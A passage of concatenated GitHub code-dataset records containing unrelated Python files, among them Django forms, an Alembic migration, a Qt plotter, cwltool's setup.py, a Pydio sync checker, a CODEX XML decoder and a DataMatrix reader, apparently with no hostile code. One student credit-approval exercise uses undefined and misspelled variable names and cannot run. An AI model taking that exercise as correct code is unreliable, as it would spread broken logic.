cv.waitKey()","repo_name":"nikfakhri06/imageDetectionLED","sub_path":"LED Test/ledTest.py","file_name":"ledTest.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"30981006419","text":"from shop.models import Product\nfrom django import forms\nfrom shop.models import STATUS_CHOICES, ORDER_BY_CHOICES\n\n\nclass FormStatus(forms.Form):\n\n status = forms.ChoiceField(\n choices=STATUS_CHOICES,\n widget=forms.Select(attrs={\"class\": \"ml-1 mr-3\"}),\n required=False,\n )\n\n cost__gt = forms.IntegerField(\n min_value=0,\n label=\"Price Min\",\n widget=forms.TextInput(attrs={\"class\": \"ml-1 mr-3\"}),\n required=False,\n )\n\n cost__lt = forms.IntegerField(\n min_value=0,\n label=\"Price Max\",\n widget=forms.TextInput(attrs={\"class\": \"ml-1 mr-3\"}),\n required=False,\n )\n\n order_by = forms.ChoiceField(\n choices=ORDER_BY_CHOICES,\n widget=forms.Select(attrs={\"class\": \"ml-1 mr-3\"}),\n required=False,\n )\n\n\nclass FilterDate(forms.Form):\n filter_by_date = forms.ChoiceField(\n choices=((\"NEW_FIRST\", \"new first\"), (\"OLD_AT_FIRST\", \"old at first\")),\n widget=forms.Select(attrs={\"class\": \"ml-1 mr-3\"}),\n required=False,\n )\n","repo_name":"apterek/dj","sub_path":"django/blog/shop/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74660882168","text":"\"\"\"Adds balance offset to transfer_account\n\nRevision ID: 103e570ddb24\nRevises: 49e8a333d285\nCreate Date: 2020-07-03 14:57:35.942456\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '103e570ddb24'\ndown_revision = '49e8a333d285'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('transfer_account', sa.Column('_balance_offset_wei', sa.Numeric(precision=27), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('transfer_account', '_balance_offset_wei')\n # ### end Alembic commands ###\n","repo_name":"teamsempo/SempoBlockchain","sub_path":"app/migrations/versions/103e570ddb24_.py","file_name":"103e570ddb24_.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"77"} +{"seq_id":"4223651674","text":"# -*- coding: utf-8 -*-\nimport PySide\n\nfrom pyqtgraph.Qt import QtGui, QtCore\nimport numpy as np\nimport pyqtgraph as pg\nimport sys\nimport time\n\n# from Queue import Queue\nfrom multiprocessing import Queue\nfrom threading import Thread\n\nfrom pyqtgraph.widgets.RawImageWidget import RawImageWidget\nimport time\n\n\nclass QtPlotter(object):\n def __init__(self, app):\n super(QtPlotter, self).__init__()\n self.app = app\n self.create_QtPlotter()\n self.data = None\n\n def create_QtPlotter(self):\n self.RAW = 1\n if self.RAW:\n self.win = QtGui.QMainWindow()\n self.win.resize(400, 400)\n self.rawImg = RawImageWidget(self.win, scaled=True)\n self.win.setCentralWidget(self.rawImg)\n self.win.show()\n else:\n self.win = pg.GraphicsLayoutWidget()\n self.win.show()\n self.win.setWindowTitle(\"TART2 - Live View\")\n view = self.win.addViewBox()\n view.setAspectLocked(True)\n self.img = pg.ImageItem(border=\"w\")\n view.addItem(self.img)\n self.timer = QtCore.QTimer()\n self.timer.timeout.connect(self.update)\n self.timer.start(0)\n self.q = Queue()\n\n def getPort(self):\n return self.q\n\n def update(self):\n # qsize = self.q.qsize()\n # print 'PlotQ size',qsize\n # if qsize > 2:\n # [self.q.get() for _ in range(qsize-1)]\n # print '!!!!!!!!!!!!!!!!!!!!!! dropping frames when displaying !!!!!!!!!!!!!!!!!!!!!!!!!!!!'\n a = time.time()\n if not self.q.empty():\n # while not self.q.empty():\n # print self.q.qsize()\n # if self.data is None:\n self.data = self.q.get()\n # else:\n # self.data[:] = self.q.get()\n # print 'drop drop drop.'\n # print data[0]\n b = time.time()\n print(b - a, \"getting data off queue\")\n if self.RAW:\n d_max = self.data.max()\n self.data /= d_max\n self.data *= 255\n self.rawImg.setImage(self.data)\n else:\n self.data -= self.data.min()\n self.data /= self.data.max()\n self.data *= 255\n # self.img.setImage(data,autoRange=True,autoLevels=True)\n self.img.setImage(self.data)\n self.app.processEvents()\n c = time.time()\n print(c - b, \"update done.\")\n\n # except Queue.Empty:\n # pass\n\n\ndef qtLoop():\n import sys\n\n if (sys.flags.interactive != 1) or not hasattr(QtCore, \"PYQT_VERSION\"):\n QtGui.QApplication.instance().exec_()\n\n\n## Start Qt event loop unless running in interactive mode or using pyside.\nif __name__ == \"__main__\":\n app = QtGui.QApplication([])\n plotter = QtPlotter(app)\n q_handle = plotter.getPort()\n\n def producer():\n while True:\n q_handle.put(np.random.normal(size=(2 ** 8, 2 ** 8)).astype(np.float16))\n time.sleep(0.05)\n\n p = Thread(target=producer)\n p.daemon = True\n p.start()\n qtLoop()\n","repo_name":"tmolteno/TART","sub_path":"hardware/rpi/tart_cli/qt_view.py","file_name":"qt_view.py","file_ext":"py","file_size_in_byte":3138,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"77"} +{"seq_id":"78138404","text":"#!/usr/bin/env python\nimport os\nimport sys\n\nimport setuptools.command.egg_info as egg_info_cmd\nfrom setuptools import setup\n\nSETUP_DIR = os.path.dirname(__file__)\nREADME = os.path.join(SETUP_DIR, 'README.rst')\n\n# if python3 runtime and `setup.py install` is called\nif sys.version_info.major == 3 and sys.argv[1] == 'install':\n print(\"Aborting installation. CWL Tool doesn't support Python 3 currently.\")\n print(\"Install using Python 2 pip.\")\n exit(1)\n\ntry:\n import gittaggers\n\n tagger = gittaggers.EggInfoFromGit\nexcept ImportError:\n tagger = egg_info_cmd.egg_info\n\nneeds_pytest = {'pytest', 'test', 'ptr'}.intersection(sys.argv)\npytest_runner = ['pytest-runner'] if needs_pytest else []\n\nsetup(name='cwltool',\n version='1.0',\n description='Common workflow language reference implementation',\n long_description=open(README).read(),\n author='Common workflow language working group',\n author_email='common-workflow-language@googlegroups.com',\n url=\"https://github.com/common-workflow-language/cwltool\",\n download_url=\"https://github.com/common-workflow-language/cwltool\",\n license='Apache 2.0',\n packages=[\"cwltool\", 'cwltool.tests'],\n package_dir={'cwltool.tests': 'tests'},\n package_data={'cwltool': ['schemas/draft-2/*.yml',\n 'schemas/draft-3/*.yml',\n 'schemas/draft-3/*.md',\n 'schemas/draft-3/salad/schema_salad/metaschema/*.yml',\n 'schemas/draft-3/salad/schema_salad/metaschema/*.md',\n 'schemas/v1.0/*.yml',\n 'schemas/v1.0/*.md',\n 'schemas/v1.0/salad/schema_salad/metaschema/*.yml',\n 'schemas/v1.0/salad/schema_salad/metaschema/*.md',\n 'schemas/v1.1.0-dev1/*.yml',\n 'schemas/v1.1.0-dev1/*.md',\n 'schemas/v1.1.0-dev1/salad/schema_salad/metaschema/*.yml',\n 'schemas/v1.1.0-dev1/salad/schema_salad/metaschema/*.md',\n 'cwlNodeEngine.js',\n 'extensions.yml']},\n include_package_data=True,\n install_requires=[\n 'setuptools',\n 'requests >= 1.0',\n 'ruamel.yaml >= 0.12.4',\n 'rdflib >= 4.2.2, < 4.3.0',\n 'shellescape >= 3.4.1, < 3.5',\n 'schema-salad >= 2.4.20170308171942, < 3',\n 'typing >= 3.5.2, < 3.6',\n 'six >= 1.8.0',\n ],\n setup_requires=[] + pytest_runner,\n test_suite='tests',\n tests_require=['pytest', 'mock >= 2.0.0',],\n entry_points={\n 'console_scripts': [\"cwltool=cwltool.main:main\"]\n },\n zip_safe=True,\n cmdclass={'egg_info': tagger},\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Operating System :: POSIX',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python :: 2 :: Only',\n ]\n )\n","repo_name":"inutano/cwltool","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"77"} +{"seq_id":"29328343099","text":"#Aprobación de créditos\ningreso = int(input(\"ingrese sus ingresos en pesos: \"))\nnaciemiento = int(input(\"ingrese su año de naciemiento: \"))\nhijos = int(input(\"ingrese su numero de hijos: \"))\npertenencia = int(input(\"ingrese sus años de pertenencia en el banco: \"))\nEcivil = str(input(\"ingrese su estado civil soltero,\"\"S\"\" o casado,\"\"C\"\": \"))\nvive = str(input(\"ingrese si vive en campo,\"\"R\"\" o en ciudad,\"\"U\"\": \"))\n\nC = casado\nS = soltero\n\nif pertenencia > 10 and hijos >= 2:\n print(\"APROBADO\")\nelif Ecivil == Casado and hijos >= 3 and 45 <= nacimiento <= 55:\n print(\"APROBADO\")","repo_name":"pabloschwarzenberg/grader","sub_path":"hito1_ej3/hito1_ej3_672ffa2eb0b95aa209b1d3973f0e261a.py","file_name":"hito1_ej3_672ffa2eb0b95aa209b1d3973f0e261a.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"655762212","text":"import tensorflow as tf\nimport numpy as np\n\ninputs = np.asarray([np.random.randint(0, 5, (6, 3)) for i in range(4)])\nlens = np.random.randint(1, 6, 4)\n# print(inputs)\nprint(lens)\n\ninput_x = tf.placeholder(dtype=tf.float32, shape=[None, 6, 3])\ninput_l = tf.placeholder(dtype=tf.int32, shape=[None])\ninput_xp = input_x ** 2\n\nre_x = tf.reverse_sequence(input_xp, seq_lengths=tf.cast(input_l, dtype=tf.int64), seq_dim=1)\n\nshape_ = tf.shape(input_xp)\n\nwith tf.Session() as sess:\n d_input_xp = sess.run(input_xp, feed_dict={input_x: inputs, input_l: lens})\n print('input:\\n', d_input_xp)\n d_shape_ = sess.run(shape_, feed_dict={input_x: inputs})\n print(d_shape_)\n d_re_x = sess.run(re_x, feed_dict={input_x: inputs, input_l: lens})\n print('re_input:\\n', d_re_x)","repo_name":"easonnie/master-tensor","sub_path":"try_tensorflow/testscript/test-reverse.py","file_name":"test-reverse.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"32649139913","text":"import fnmatch\nfrom watchdog.utils.dirsnapshot import DirectorySnapshot as dirsnap\nfrom requests.exceptions import ReadTimeout\nimport logging\nimport platform\nimport unicodedata\nimport os\nimport time\n\nclass SyncChecker():\n \"\"\" An object to check sync, based on listing local and remote files\n \"\"\"\n def __init__(self, job_id, jobs, sdk):\n \"\"\"\n :param jobid: the job_id to check\n :param conf: the information from job_configs.json\n :param sdk: a remote sdk\n \"\"\"\n self.jobid = job_id\n self.conf = jobs\n self.sdk = sdk\n\n def toset(self, prefix, pathset):\n \"\"\" transform an absolute path set to a relative path set \"\"\"\n rel_path = set()\n for p in pathset:\n rel_path.add(p.replace(prefix, ''))\n return rel_path\n\n\n def recursive_list(self, path):\n ls = dict()\n folder_queue = [path]\n\n while len(folder_queue):\n ignore = False\n folder = folder_queue.pop(0)\n for excluded in self.sdk.remote_excluded_files:\n if folder.startswith(excluded):\n ignore = True\n break\n\n if ignore:\n continue\n\n result = self.sdk.list(dir=folder, recursive='false', max_depth=1)\n del result[folder]\n keys = list(result.keys())\n if len(keys) == 0:\n continue\n\n blk_stats = self.sdk.bulk_stat(list(result.keys()), with_hash=True)\n for p in blk_stats:\n stats = blk_stats[p]\n ls[p] = stats\n if stats.has_key('hash') and stats['hash'] == 'directory' and p != folder:\n folder_queue.append(p)\n return ls\n\n\n def docheck(self, path, subfolder=\"\"):\n \"\"\" Using PydioSdk connects to a server and compares the list of files at\n :param path: with the list of files at the :param sdk:\n \"\"\"\n remote_ls = self.recursive_list(path=\"/\")\n\n if subfolder != \"\":\n remote2 = {}\n for p in remote_ls:\n remote2[p.replace(subfolder, \"\", 1)] = remote_ls[p]\n remote_ls = remote2\n local_ls = dirsnap(path)\n def dodiff(remotefiles, localfiles):\n \"\"\" from {'path/to/file': file, ...}, set('path/to/file', ...) do a\n check that the same files are present returns dict of dict of files\n {missing_local, missing_remote}\n \"\"\"\n missing = {}\n logging.info(str(len(missing)) + \" \" + str(len(localfiles)))\n removed = 0\n for k in remotefiles.keys():\n try:\n if platform.system() == 'Darwin':\n localfiles.remove(unicodedata.normalize('NFD', k))\n removed += 1\n else:\n localfiles.remove(os.path.normpath(k))\n except KeyError as e:\n missing[k] = time.time()\n logging.info(str(len(missing)) + \" \" + str(len(localfiles)))\n logging.info(\"Removed \" + str(removed))\n return {\"missing_local\": missing, \"missing_remote\": localfiles}\n #print(remote_ls)\n diff = dodiff(remote_ls, self.toset(path, local_ls.paths))\n return diff\n\n def parseWithExcludes(self, diff, excludes):\n \"\"\" Parses a diff, returns only items not matching excludes\n :param diff: will be MUTATED\n :param excludes: the list of patterns to delete\n TODO This code could probably be heavily optimized if the need appeared\n \"\"\"\n ndiff = {\"missing_remote\": dict(), \"missing_local\": dict()}\n excludes.append('')\n for p in diff[\"missing_local\"].keys():\n skip = False\n for patt in excludes:\n if fnmatch.fnmatch(p, patt):\n skip = True\n break\n if not skip:\n ndiff[\"missing_local\"][p] = diff[\"missing_local\"][p]\n for p in diff[\"missing_remote\"]:\n skip = False\n for patt in excludes:\n if fnmatch.fnmatch(p, patt):\n skip = True\n break\n if not skip:\n ndiff[\"missing_remote\"][p] = \"\"\n return ndiff\n\n def dofullcheck(self):\n \"\"\"\n Ask the remote sdk for a recursive list of files, compares with the local tree\n :return: dictionary containing path to missing files (missing_remote, missing_local)\n \"\"\"\n excludes = self.conf[self.jobid].filters['excludes']\n diff = self.docheck(self.conf[self.jobid].directory, self.conf[self.jobid].remote_folder)\n cleaned = self.parseWithExcludes(diff, excludes)\n return cleaned\n# end of SyncChecker\n\nclass SyncHardener():\n \"\"\"\n Check the status of non-IDLE files\n \"\"\"\n def resyncfolder(self):\n pass\n# end of SyncHardener","repo_name":"sha1/pydio-sync","sub_path":"src/pydio/utils/check_sync.py","file_name":"check_sync.py","file_ext":"py","file_size_in_byte":4983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"77"} +{"seq_id":"44535348761","text":"import pandas as pd\nfrom pathlib import Path\nimport numpy as np\nimport randomname\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import select\n\nfrom db_connector.src.models import MusicInfo\n\n\ndef get_music_connector(type, **config):\n if type == \"LocalDisk\":\n return DiskMusicConnector(**config)\n if type == \"DB\":\n return DBMusicConnector(**config)\n return None\n\n\nclass DBMusicConnector:\n def __init__(self, cri, music_location, echo=False):\n self.engine = create_engine(cri, echo=echo)\n self.session = Session(self.engine)\n\n self.music_location = Path(music_location)\n self.names_domains = {\"adj\": (\"music_theory\",), \"noun\": (\"cats\", \"food\")}\n\n def get_music_info(self, music_ids: list[int]):\n \"\"\"\n returns related information to music like Author etc.\n \"\"\"\n results = (\n self.session.query(MusicInfo.path).filter(MusicInfo.id.in_(music_ids)).all()\n )\n rel_paths = [row[0] for row in results]\n print(rel_paths)\n\n authors = [\n randomname.get_name(**self.names_domains) for i in range(len(rel_paths))\n ]\n music_names = [\n randomname.get_name(**self.names_domains) for i in range(len(rel_paths))\n ]\n genres = [rel_path.split(\"/\")[0] for rel_path in rel_paths]\n\n return [\n {\n \"path\": rel_path,\n \"author\": author,\n \"music_name\": music_name,\n \"genre\": genre,\n \"id\": m_id,\n }\n for rel_path, author, music_name, genre, m_id in zip(\n rel_paths, authors, music_names, genres, music_ids\n )\n ]\n\n def __del__(self):\n self.session.close()\n\n\nclass DiskMusicConnector:\n def __init__(self, music_info_path, music_location):\n self.music_info = pd.read_csv(music_info_path, index_col=\"song_id\")\n self.music_location = Path(music_location)\n self.names_domains = {\"adj\": (\"music_theory\",), \"noun\": (\"cats\", \"food\")}\n\n def get_music_info(self, music_ids: list[int]):\n \"\"\"\n returns related information to music like Author etc.\n \"\"\"\n rel_paths = self.music_info.loc[np.array(music_ids)].paths.to_list()\n authors = [\n randomname.get_name(**self.names_domains) for i in range(len(rel_paths))\n ]\n music_names = [\n randomname.get_name(**self.names_domains) for i in range(len(rel_paths))\n ]\n genres = [rel_path.split(\"/\")[0] for rel_path in rel_paths]\n\n return [\n {\n \"path\": rel_path,\n \"author\": author,\n \"music_name\": music_name,\n \"genre\": genre,\n \"id\": m_id,\n }\n for rel_path, author, music_name, genre, m_id in zip(\n rel_paths, authors, music_names, genres, music_ids\n )\n ]\n","repo_name":"linearbaby/VKR","sub_path":"Web/utils/music_connector.py","file_name":"music_connector.py","file_ext":"py","file_size_in_byte":2983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"71148372410","text":"# _*_ coding: utf-8 _*_\n\"\"\"\nTime: 2020/11/30 17:02\nAuthor: Ding Cheng(Deeachain)\nFile: dataset_builder.py\nDescribe: Write during my study in Nanjing University of Information and Secience Technology\nGithub: https://github.com/Deeachain\n\"\"\"\nimport os\nimport pickle\nimport pandas as pd\nfrom dataset.liveness import LivenessTrainDataSet, LivenessValDataSet, LivenessTestDataSet, LivenessTestVideo\nimport glob\n\ndef build_dataset_train(root, base_size, crop_size, test_mode=False):\n data_dir = root#os.path.join(root, dataset)\n train_data_list = os.path.join(root, 'datasets/train_list.txt')\n \n \n TrainDataSet = LivenessTrainDataSet(data_dir, train_data_list, base_size=base_size, crop_size=crop_size,\n ignore_label=0, test_mode= test_mode) \n return TrainDataSet\n\n\ndef build_dataset_test(root, crop_size, gt=False, test_mode=False):\n data_dir = root \n train_data_list = os.path.join(root, 'datasets/train_list.txt')\n \n test_data_list = os.path.join(root, 'datasets/test_list.txt')\n \n \n \n \n if gt:\n test_data_list = os.path.join(root, 'datasets/test_list.txt')\n testdataset = LivenessValDataSet(data_dir, test_data_list, crop_size=crop_size, ignore_label=0, test_mode= test_mode)\n else:\n test_data_list = os.path.join(root, 'datasets/test_list.txt')\n testdataset = LivenessTestDataSet(data_dir, test_data_list, crop_size=crop_size, ignore_label=0)\n \n return testdataset\n\ndef build_dataset_mp4(root, crop_size, frame_num=5):\n\n if root =='':\n root ='.'\n mp4_list = root +'/*/*/*.mp4'\n files = glob.glob(mp4_list)\n\n mp4data= LivenessTestVideo(root= '', crop_size= crop_size, file_txt = files, frame_num= frame_num)\n return mp4data\n\n","repo_name":"trankha1655/Zalo_liveness_detection","sub_path":"builders/dataset_builder.py","file_name":"dataset_builder.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"7946011804","text":"import cv2\nfrom pylibdmtx import pylibdmtx\nimport threading\nimport numpy as np\nfrom ModbusModule import *\n\n#import zxingcpp\n#import numpy\n\n# from dbr import BarcodeReader, EnumErrorCode\n\nreaded = True\n\nmodbus = ModbusModule()\n\ndef decode_frame(frame):\n global readed\n readed = False\n print(\"decode ediliyor\")\n data = pylibdmtx.decode(frame)\n print(data)\n readed = True\n\n\n# vid = cv2.VideoCapture('/dev/v4l/by-id/usb-Arducam_Technology_Co.__Ltd._Arducam_16MP_SN0001-video-index0')\n# vid.set(cv2.CAP_PROP_EXPOSURE, 500)\n# vid.set(cv2.CAP_PROP_FOURCC, cv2.VideoWriter.fourcc('M','J','P','G'))\n# vid.set(cv2.CAP_PROP_FRAME_WIDTH,1600)\n# vid.set(cv2.CAP_PROP_FRAME_HEIGHT,1200)\n\nvid = cv2.VideoCapture('/dev/v4l/by-id/usb-Arducam_Technology_Co.__Ltd._Arducam_OV2311_USB_Camera_UC621-video-index0')\nvid.set(cv2.CAP_PROP_EXPOSURE, 500)\nvid.set(cv2.CAP_PROP_FOURCC, cv2.VideoWriter.fourcc('Y','U','Y','V'))\nvid.set(cv2.CAP_PROP_FRAME_WIDTH,1600)\nvid.set(cv2.CAP_PROP_FRAME_HEIGHT,1200)\n\n\n\nmodbus.connect_modbus()\ntime.sleep(5)\nmodbus.open_blue_led()\n\nwhile(True):\n try:\n # Capture the video frame\n # by frame\n # print(\"frame alınıyor.\")\n ret, frame = vid.read()\n\n\n # Display the resulting frame\n if ret:\n matrix = cv2.getPerspectiveTransform(np.float32([[563,208],[562,1099],[1389,215],[1380,1092]]),np.float32([[0,0],[0,700],[700,0],[700,700]]))\n frame = cv2.warpPerspective(frame,matrix,(700,700))\n\n cv2.imshow('frame', frame)\n\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n # ret,thresh = cv2.threshold(frame, 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)\n _,thresh = cv2.threshold(frame, int(np.max(frame)*0.8), 255, cv2.THRESH_BINARY)\n \n if readed == True:\n threading.Thread(target=decode_frame,args=(thresh,),daemon=True).start()\n \n #1\n #np_arr = numpy.array(frame)\n #results = zxingcpp.read_barcodes(np_arr)\n #print(results)\n\n #2 Çok hızlı ama ücretli\n # reader = BarcodeReader()\n # results = reader.decode_buffer(frame)\n # if results != None:\n # for text_result in results:\n # print(\"Barcode Format : \")\n # print(text_result.barcode_format_string)\n # print(\"Barcode Text : \")\n # print(text_result.barcode_text)\n # print(\"Localization Points : \")\n # print(text_result.localization_result.localization_points)\n # print(\"Exception : \")\n # print(text_result.exception)\n # print(\"-------------\")\n # print(results)\n \n else:\n print(\"frame yok\")\n \n # the 'q' button is set as the\n # quitting button you may use any\n # desired button of your choice\n if cv2.waitKey(1) & 0xFF == ord('q'):\n modbus.close_all_coils()\n break\n\n except Exception as e:\n print(\"except\",e)\n break\n\n# After the loop release the cap object\nvid.release()\n# Destroy all the windows\ncv2.destroyAllWindows()\n","repo_name":"codderdreamer/DataMatrixReader","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"26144709149","text":"dics = {\n\n \"virat\" : \"big\", \n \"satyam\" : \"true\",\n \"bhagwan\" : \"God\",\n \"sona\" : \"sleep\",\n \"kapda\" : \"cloth\",\n}\n\nprint(\"Options are : \", dics.keys())\n\na = input(\"Enter Your Word : \")\n\nprint(\"The meaning of your word is : \", dics[a])\n","repo_name":"satyampatel13/Python_CT55","sub_path":"python 27 programs/q10.py","file_name":"q10.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"415171188","text":"# Using Python to solve the questions.\n# Question 4\n\n\ndef determinFinger(num):\n r = num % 8\n if r == 1:\n return \"Thumb\"\n if r == 5:\n return \"Little Finger\"\n if r == 0 or r == 2:\n return \"Index Finger\"\n if r == 3 or r == 7:\n return \"Middle Finger\"\n if r == 4 or r == 6:\n return \"Ring Finger\"\n\n\nprint(determinFinger(13))\n","repo_name":"ntexplorer/PythonPractice","sub_path":"CashCalc_Recruiment/Q4.py","file_name":"Q4.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31343405957","text":"\"\"\"XML decoder for CODEX\"\"\"\n\nimport xml.etree.ElementTree as ET\nimport numpy as np\nimport math\n\n\nclass XMLDecoder:\n\n def __init__(self):\n self.decoded_content = dict()\n\n def _number_of_cycles(self, root):\n number = 0\n exposures = root.find('Exposures')\n for item in exposures.findall('ExposureItem'):\n active = item.find('Active').text\n if active == 'true':\n number += 1\n return number\n\n def _number_of_channels(self, root):\n channels = root.find('Channels')\n number = len(channels.findall('string'))\n return number\n\n # https://github.com/KnottLab/codex/blob/2ff63079a3964dea6e242a20defec5851630042e/functions/data_utils/create_CODEX_object.m#L215\n def _number_of_xy_tiles(self, root):\n attachment = root.find('Element').find('Data').find('Image').find('Attachment')\n px = []\n py = []\n\n for tile in attachment.findall('Tile'):\n # flip X and Y here too??\n px.append(tile.get('PosY'))\n py.append(tile.get('PosX'))\n\n positions = [(i,j) for i,j in zip(px,py)]\n Upx = np.unique(px)\n Upy = np.unique(py)\n\n x = len(Upx)\n y = len(Upy)\n\n real_tiles = np.zeros((x,y), dtype=object)\n real_tiles[:] = 'x'\n print(f'Building real tiles array: {real_tiles.shape}')\n # snakes like this:\n # 01 02 03 04\n # 08 07 06 05\n # 09 10 11 12\n tile_num = 0 # start tile numbering at 0\n for i in range(x):\n Ry = np.arange(y) if i%2==0 else np.arange(y)[::-1]\n for j in Ry:\n if (Upx[i], Upy[j]) in positions:\n real_tiles[i,j] = f'{tile_num:02d}'\n tile_num += 1\n Ntiles = len(positions)\n return x, y, real_tiles, Ntiles\n\n def _number_of_z_stacks(self, root):\n z_stacks = int(root.find('ZstackDepth').text)\n return z_stacks\n\n def _get_tile_width(self, root):\n dimension = root.find('Element').find('Data').find('Image').find('ImageDescription').find('Dimensions')\n width = int(dimension.find('DimensionDescription').get(\"NumberOfElements\"))\n height = int(dimension.find('DimensionDescription').get('NumberOfElements'))\n overlap_x = 0\n overlap_y = 0\n\n attachments = root.find('Element').find('Data').find('Image').findall('Attachment')\n for a in attachments:\n if a.get(\"Name\") == \"HardwareSetting\":\n atl = a.find(\"ATLCameraSettingDefinition\")\n xy = atl.find('XYStageConfiguratorSettings')\n stitch = xy.find('StitchingSettings')\n overlap_x = float(stitch.get('OverlapPercentageX'))\n overlap_y = float(stitch.get('OverlapPercentageY'))\n\n overlap_width = width - math.floor((1 - overlap_x) * width)\n overlap_height = height - math.floor((1 - overlap_y) * height)\n\n return width, height, overlap_x, overlap_y, overlap_width, overlap_height\n\n def _get_resolutionh(self, root):\n dimension = root.find('Element').find('Data').find('Image').find('ImageDescription').find('Dimensions')\n width = int(dimension.find('DimensionDescription').get(\"NumberOfElements\"))\n length = float(dimension.find('DimensionDescription').get('Length'))\n\n return (10 ** 6) * length / width\n\n def _get_marker_names(self, root, num_cycles, num_channels):\n exposure_items = root.find('Exposures').findall('ExposureItem')\n marker_list = []\n marker_names = []\n for item in exposure_items[:num_cycles]:\n antibody = item.find('AntiBody').findall('string')\n for a in antibody:\n marker_names.append(a.text.replace('/', '-').replace(' ', '-'))\n\n for i, marker in enumerate(marker_names):\n marker_list.append(marker + '_' + str(i))\n\n marker_names_array = np.array(marker_names)\n marker_names_array = marker_names_array.reshape(num_cycles, num_channels)\n marker_list = np.array(marker_list)\n marker_array = marker_list.reshape(num_cycles, num_channels)\n return marker_names, marker_list, marker_array, marker_names_array\n\n def _get_exposure_times(self, root):\n exposure_item = root.find('Exposures').find('ExposureItem')\n exposure_time = exposure_item.find('ExposuresTime')\n decimal_values = []\n for decimal in exposure_time.findall('decimal'):\n decimal_values.append(int(decimal.text))\n return decimal_values\n\n def _get_wavelengths(self, root):\n exposure_item = root.find('Exposures').find('ExposureItem')\n wavelength = exposure_item.find('WaveLength')\n wavelength_values = []\n for values in wavelength.findall('decimal'):\n wavelength_values.append(int(values.text))\n return wavelength_values\n\n def _get_channels(self, root):\n channels = root.find(\"Channels\")\n channel_names = []\n for name in channels.findall('string'):\n channel_names.append(name.text)\n return channel_names\n\n def decode(self, file_content_xml, file_content_xlif, cycle_folders):\n root_xml = ET.fromstring(file_content_xml)\n root_xlif = ET.fromstring(file_content_xlif)\n self.decoded_content['roi'] = 1\n self.decoded_content['ncl'] = self._number_of_cycles(root_xml)\n self.decoded_content['cycle_folders'] = cycle_folders\n self.decoded_content['nch'] = self._number_of_channels(root_xml)\n self.decoded_content['nz'] = self._number_of_z_stacks(root_xml)\n tile_info = self._number_of_xy_tiles(root_xlif)\n self.decoded_content['nx'] = tile_info[0]\n self.decoded_content['ny'] = tile_info[1]\n self.decoded_content['real_tiles'] = tile_info[2]\n self.decoded_content['Ntiles'] = tile_info[3]\n # self.decoded_content['RNx'] = # for dealing with non-rectangular ROIs\n # self.decoded_content['RNy'] = # for dealing with non-rectangular ROIs\n # self.decoded_content['real_tiles'] = # for dealing with non-rectangular ROIs\n self.decoded_content['tileWidth'], self.decoded_content['tileHeight'], self.decoded_content['ox'], \\\n self.decoded_content['oy'], self.decoded_content['width'], self.decoded_content[\n 'height'] = self._get_tile_width(root_xlif)\n self.decoded_content['exposure_times'] = self._get_exposure_times(root_xml)\n self.decoded_content['channels'] = self._get_channels(root_xml)\n self.decoded_content['wavelengths'] = self._get_wavelengths(root_xml)\n self.decoded_content['resolution'] = self._get_resolutionh(root_xlif)\n self.decoded_content['marker_names'], self.decoded_content['markers'], \\\n self.decoded_content['marker_array'], self.decoded_content['marker_names_array'] = self._get_marker_names(\n root_xml, self.decoded_content['ncl'],\n self.decoded_content['nch'])\n\n return self.decoded_content\n","repo_name":"KnottLab/codex","sub_path":"preprocessing/xml_decoder.py","file_name":"xml_decoder.py","file_ext":"py","file_size_in_byte":7030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39203502449","text":"#!/usr/bin/env python3\nimport html\nimport sqlite3\n\nimport bottle\n\nimport utils\n\n@bottle.get('/')\ndef index():\n\treturn f'

mattermost.fsinf.at glue API

'\\\n\t\t\t'

Redirect to channel by course code

/channel_by_course_code/<code>
